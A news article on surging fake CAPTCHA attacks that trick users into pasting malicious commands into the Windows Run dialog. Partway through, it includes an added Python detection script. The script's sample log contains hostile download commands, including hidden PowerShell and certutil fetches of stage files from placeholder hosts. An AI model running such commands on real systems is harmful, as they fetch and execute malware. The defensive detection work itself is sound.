Fake CAPTCHA attacks surged in late 2024 – here’s what to look out for


A new variant of social engineering attack using fake CAPTCHA pages to deceive victims has spiked in the last few months, security experts have warned.

Recent analysis from cyber specialists Reliaquest revealed criminals were leveraging fraudulent CAPTCHA pages that mimic trusted services like Google and Cloudflare to trick users into running malicious scripts on their machines.

Although the campaign was first spotted in September, Reliaquest noted that between October and early December 2024 its customers observed almost twice as many fake CAPTCHA websites as they had in September.

The firm speculated this was probably the result of threat actors sharing the templates for the fake webpages with other cyber criminals.

“This surge was likely the result of researchers releasing the templates used for these campaigns, which inadvertently provided more threat actors with the tools to easily replicate these tactics.”

The report noted sophisticated threat groups such as APT28 (Fancy Bear), which has ties to the Russian military, were using the technique, citing an investigation by Ukraine’s national cyber defense team on APT28’s use of fake CAPTCHA pages.

“A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA) revealed APT28 had been using fake CAPTCHA systems to infiltrate local governments,” Reliaquest added.

“By mimicking reCAPTCHA interfaces, they tricked users into executing commands that downloaded harmful scripts. These scripts are capable of establishing Secure Shell (SSH) tunnels and exfiltrating data, highlighting the attack’s simplicity and potency.”

Evolution of fake CAPTCHA attacks presents ‘significant risk’

Reliaquest described the attack chain as “deceptively simple”: visitors to compromised websites are redirected to a fake CAPTCHA page.

But instead of the usual ‘click on the images of traffic crossings’ or retyping an obfuscated series of letters, the user is prompted to open a Run prompt and paste a command that was covertly copied to their clipboard when they visited the site.

This malicious command leads to the installation of malware, typically a credential stealer such as Lumma Stealer.

Security researchers have dubbed this approach, in which victims execute the malicious commands themselves, ‘Scam-Yourself’ attacks.


Security services provider Gen Digital said it detected a significant uplift in these types of attacks towards the end of 2024, recording a 614% quarter-over-quarter spike in Q3 2024. It concluded that “social engineering, psychological manipulation tactics continue to be one of the most dangerous tools in the cybercriminal arsenal.”

The report added it protected over 2 million users from the fake CAPTCHA variant of these ‘Scam-Yourself’ attacks in the same period.

Reliaquest warned hackers would continue to refine fake CAPTCHA attack techniques, making them harder to spot. The firm also predicted the addition of alternative execution methods would present a “significant risk” to organizations in the near future.

“Within the next three months, we anticipate enhancements in the fake CAPTCHA infection vector, such as employing alternative execution methods that do not use PowerShell commands,” it explained.

“This could involve using other LOLBins like forfiles.exe or certutil.exe to download the initial stage, aiming to circumvent existing detection measures.”
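The attack chain described earlier (a command pasted into the Windows Run dialog that launches PowerShell to fetch a stager) and the LOLBin variants Reliaquest anticipates above (forfiles.exe, certutil.exe) share two observable traces a defender can key on: the downloader is spawned by explorer.exe with a URL on its command line, and the pasted text is recorded in the Run dialog's history key, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following detection logic is an added example, not code from Reliaquest, Gen Digital or the article; it assumes a simplified pipe-separated event format (process creation and registry value writes) and runs over constructed sample lines. The binaries pwsh.exe and mshta.exe in the watch list are my additions; the others are named in the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Stage-one downloaders: PowerShell (current campaigns) and the LOLBins the report
# anticipates; pwsh.exe and mshta.exe are assumptions added for coverage.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "forfiles.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Event:
    ts: str
    kind: str     # "proc" (process creation) or "reg" (registry value set)
    parent: str   # parent image for proc events, empty for reg events
    target: str   # child image for proc events, registry key path for reg events
    detail: str   # command line for proc events, value data for reg events


def parse_line(line: str) -> Optional[Event]:
    """Parse one pipe-separated event line; None for blank or malformed lines."""
    parts = line.split("|", 4)          # keep any '|' inside the last field intact
    if len(parts) != 5:
        return None
    return Event(*parts)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> Optional[str]:
    """Return a detection name when the event matches a fake-CAPTCHA pattern."""
    if ev.kind == "proc":
        # Commands entered in the Run dialog are spawned by explorer.exe; requiring a
        # URL on the command line filters out users who merely open a shell.
        if (basename(ev.parent) == "explorer.exe"
                and basename(ev.target) in SUSPICIOUS_CHILDREN
                and URL_RE.search(ev.detail)):
            return "run-dialog-lolbin-download"
    elif ev.kind == "reg":
        # The Run dialog keeps its history under Explorer\RunMRU, so the pasted text
        # usually survives there after the downloader process has exited.
        names = {b[:-4] for b in SUSPICIOUS_CHILDREN}
        if ("\\explorer\\runmru" in ev.target.lower()
                and (URL_RE.search(ev.detail)
                     or any(n in ev.detail.lower() for n in names))):
            return "runmru-suspicious-command"
    return None


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Return (timestamp, detection) pairs for every matching event in the log."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reason = check_event(ev)
        if reason:
            hits.append((ev.ts, reason))
    return hits


# Constructed sample telemetry (not real logs). Format: ts|kind|parent|target|detail
SAMPLE_LOG = r"""
2024-12-01T10:00:01|proc|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c "Invoke-WebRequest http://captcha-verify.example/v.ps1 -OutFile v.ps1"
2024-12-01T10:00:05|proc|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt
2024-12-01T10:01:10|proc|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -f http://cdn.example/stage1.bin stage1.bin
2024-12-01T10:02:00|proc|C:\Program Files\Git\cmd\git.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File build.ps1 https://internal.example/artifacts
2024-12-01T10:03:00|proc|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile
2024-12-01T10:03:30|reg||HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU|powershell -w hidden -c "Invoke-WebRequest http://captcha-verify.example/v.ps1 -OutFile v.ps1"\1
2024-12-01T10:04:00|reg||HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU|calc\1
"""

if __name__ == "__main__":
    for ts, reason in scan(SAMPLE_LOG):
        print(ts, reason)
```

Of the seven constructed events, three fire: the explorer-spawned PowerShell and certutil downloads and the RunMRU entry holding the pasted command. The PowerShell launched by git.exe and the interactive `powershell -NoProfile` do not, which is the point of the parent-plus-URL pairing. Against real Sysmon or EDR telemetry the same two conditions apply unchanged; the RunMRU rule in particular is worth keeping because it catches the paste even when process logging missed the short-lived downloader.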

Solomon Klappholz
Staff Writer

Solomon Klappholz is a Staff Writer at ITPro. He has experience writing about the technologies that facilitate industrial manufacturing which led to him developing a particular interest in IT regulation, industrial infrastructure applications, and machine learning.